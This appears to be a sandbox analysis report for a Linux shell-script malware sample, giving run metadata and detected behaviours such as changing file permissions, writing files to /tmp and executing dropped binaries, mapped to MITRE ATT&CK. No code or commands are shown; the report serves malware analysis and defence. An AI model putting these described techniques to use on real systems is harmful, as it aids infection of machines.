Analysis
-
max time kernel
19s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240508-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
18/10/2024, 01:59
Static task
static1
Behavioral task
behavioral1
Sample
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
-
Size
10KB
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads